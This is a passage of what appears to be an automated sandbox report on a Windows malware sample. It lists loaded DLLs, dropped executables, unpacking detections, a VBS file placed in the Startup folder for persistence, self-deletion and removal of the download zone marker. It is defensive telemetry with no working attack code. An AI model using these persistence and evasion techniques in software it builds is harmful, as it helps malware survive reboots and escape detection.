        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: shfolder.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\C3F.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: mscoree.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: rasapi32.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: rasman.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: rtutils.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: schannel.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: msasn1.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: gpapi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: amsi.dll
        Source: C:\Users\user\AppData\Roaming\Result.exeSection loaded: userenv.dll
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 3E6C.exe, 0000000C.00000002.4121138096.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.0000000003F89000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 3E6C.exe, 0000000C.00000002.4121138096.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.0000000003F89000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: protobuf-net.pdbSHA256}Lq source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: protobuf-net.pdb source: 3E6C.exe, 0000000C.00000002.4118759240.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, 3E6C.exe, 0000000C.00000002.4060110379.00000000040BD000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeUnpacked PE file: 0.2.hoEtvOOrYH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
        Source: C:\Users\user\AppData\Roaming\jagviseUnpacked PE file: 5.2.jagvise.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
        .NET source code contains potential unpacker
        Source: 12.2.3E6C.exe.6d50000.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
        Source: 12.2.3E6C.exe.6d50000.6.raw.unpack, ListDecorator.cs.Net Code: Read
        Source: 12.2.3E6C.exe.6d50000.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
        Source: 12.2.3E6C.exe.6d50000.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
        Source: 12.2.3E6C.exe.6d50000.6.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
        Source: 12.2.3E6C.exe.3f89550.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
        Source: 12.2.3E6C.exe.42b10c0.1.raw.unpack, ExtendedEmitter.cs.Net Code: EmitConvertibleEmitter System.Reflection.Assembly.Load(byte[])
        Source: 12.2.3E6C.exe.42b10c0.1.raw.unpack, EnumeratorSelector.cs.Net Code: RunGeneralStack
        Source: 12.2.3E6C.exe.42b10c0.1.raw.unpack, AdjustableAggregator.cs.Net Code: CallExtractor
        Yara detected Costura Assembly Loader
        Source: Yara matchFile source: 12.2.3E6C.exe.6c60000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000C.00000002.3947321786.0000000003027000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.4116101719.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 3E6C.exe PID: 5796, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\A723.exeCode function: 7_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,7_2_00406328
        Source: 77D2.exe.1.drStatic PE information: real checksum: 0x80f85f should be: 0x81b7cb
        Source: 3E6C.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x159bc8
        Source: Result.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x159bc8
        Source: C3F.exe.1.drStatic PE information: real checksum: 0x127cc4 should be: 0x127d64
        Source: A723.exe.1.drStatic PE information: real checksum: 0x6fef53 should be: 0x6f5ed0
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00403403 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040343D push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004034CC push esi; iretd 0_2_004034CD
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00403354 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_0040333B push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033C6 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033DA push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033E3 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033EC push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033ED push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033F8 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033FB push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033FE push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_00403384 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033A7 push ecx; ret 0_2_004033A8
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033A9 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403413
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B128A push esi; retf 0_2_008B12A6
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B0485 push eax; ret 0_2_008B0452
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B0397 push eax; ret 0_2_008B0452
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B03AF push eax; ret 0_2_008B0452
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B03D6 push eax; ret 0_2_008B0452
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B0400 push eax; ret 0_2_008B0452
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B0515 push esi; iretd 0_2_008B0516
        Source: C:\Users\user\Desktop\hoEtvOOrYH.exeCode function: 0_2_008B0433 push eax; ret 0_2_008B0452
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00403403 push eax; ret 5_2_00403413
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040343D push eax; ret 5_2_00403413
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_004034CC push esi; iretd 5_2_004034CD
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_00403354 push eax; ret 5_2_00403413
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_0040333B push eax; ret 5_2_00403413
        Source: C:\Users\user\AppData\Roaming\jagviseCode function: 5_2_004033C6 push eax; ret 5_2_00403413
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\77D2.exeJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C3F.exeJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A723.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\BookingsJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3E6C.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeFile created: C:\Users\user\AppData\Roaming\Result.exeJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jagviseJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jagviseJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\A723.exeFile created: C:\Users\user\AppData\Local\Temp\BookingsJump to dropped file

        Boot Survival

        barindex
        Drops VBS files to the startup folder
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbsJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\3E6C.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Result.vbsJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Deletes itself after installation
        Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\hoetvooryh.exeJump to behavior
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jagvise:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\A723.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
